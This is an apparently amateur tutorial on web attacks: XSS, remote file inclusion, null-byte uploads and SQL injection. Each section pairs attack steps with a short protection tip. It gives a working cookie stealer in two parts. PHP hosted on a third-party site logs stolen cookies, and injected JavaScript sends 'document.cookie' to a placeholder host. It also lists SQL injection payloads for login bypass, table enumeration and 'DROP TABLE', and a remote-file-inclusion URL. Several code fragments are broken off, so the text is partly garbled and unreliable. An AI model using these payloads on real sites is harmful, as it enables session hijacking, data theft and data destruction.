Cross side scripting (XSS):
Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. Cross site scripting occurs when a web application gathers malicious data from a user. Often attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user in order to gather data from them. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible.
Attacks:
XSS Cookie Stealer:
Here I am showing a simple technique to steal the secured cookies from a site. This is injecting some code in insecure site so that user cookies will be logged. Cookies are used on allot of websites to verify authentication. The cookies are unique for each user. So, if we take the cookies we are technically able to become that user.
Now, let’s get down to it with some cookie stealer code. First of all I need a third party host site to put some php code.
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
window.location = 'http://yoursite.com/stealer.php?cookie=' + document.cookie;
</script>>
cookie to the end. If we now check our file there should be a user cookie inside
‘cookies11.txt’.
Cookie Manipulation:
Here this s very simple example. Sometimes you will see cookies that look like:
Or
Logged_in=true;
Protection:
The simple procedure is “Never trust user input and always filter metacharacters”. You can filter them or HTML encode them. As user experiences always try to avoid go to external links that means any link to others host. This can solve 90% of your problems.
Remote file inclusion (RFI):
Remote file inclusion is major attacks on php programs. Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. Once they can do that, they can access anything that the PHP program could: databases, password files, etc. They can install their own shell running with the privileges of the web server user (such as 'apache' or 'httpd') and if the server has not been patched for some local user privilege escalation vulnerability, the shell could be used to become the root user.
Attacks:
In default configuration of php installation allow_url_fopen = On is set. This capability even works for what, seemingly, should be restricted to the local filesystem such as the 'include' and 'require' directives.Consider the following:
http://vulnerable.com/RFI2.php?own_me=http://example.com/badcode
Here no need of register_globals to be on.
Protection:
Be Careful about of include() or require().
Instead using of include($page.’otherpage.php’) use include($’otherpage.php’).
And be attentive about register_globals configuration.
Null Byte – picture upload:
A null character/null byte/null terminator is a character with a value of zero that is shown in the ASCII Charest. And, in programming languages (php included) the null byte is used as, what’s know as, a ’string terminator’.
Attacks:
Now that we have a target we are able to start exploiting.go to your targets upload page and click the ‘Browse’ button and navigate to a php shell.just for the sake of Proof of Concept, try to upload this file normally. You will get an error such as:
Protection:
Check the file type instead of file extension.
SQL Injection:
SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
Attacks:
The Target Intranet
This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. These results in the potential manipulation of the statements performed on the database by the end user of the application.
FROM table
WHERE field = '$EMAIL';
Then query will be,
FROM table
WHERE field = 'anything' OR 'x'='x';
Schema field mapping:
Now we are trying to retrieve the schema (field name of a tale),Well This process will involve quite a lot of guessing.Let’s consider the following case.
FROM table
WHERE field = 'x' AND email IS NULL; --';
Finding the table name:
Let’s consider the following case,
FROM table
WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';
FROM members
WHERE email = 'x' AND members.email IS NULL; --';
Finding some users:
FROM members
WHERE email = 'x' OR full_name LIKE '%Bob%';
Brute-force password guessing:
FROM members
WHERE email = 'bob@example.com' AND passwd = 'hello123';
FROM members
WHERE email = 'x'; DROP TABLE members; --'; -- Boom!
Protection:
When user gives any data as input filter single quote or double quote. Or you can add additional black slash before each single quote or double quote. Different database can return the sever error message and error number. Avoid showing the errors to the user rather show users readable message.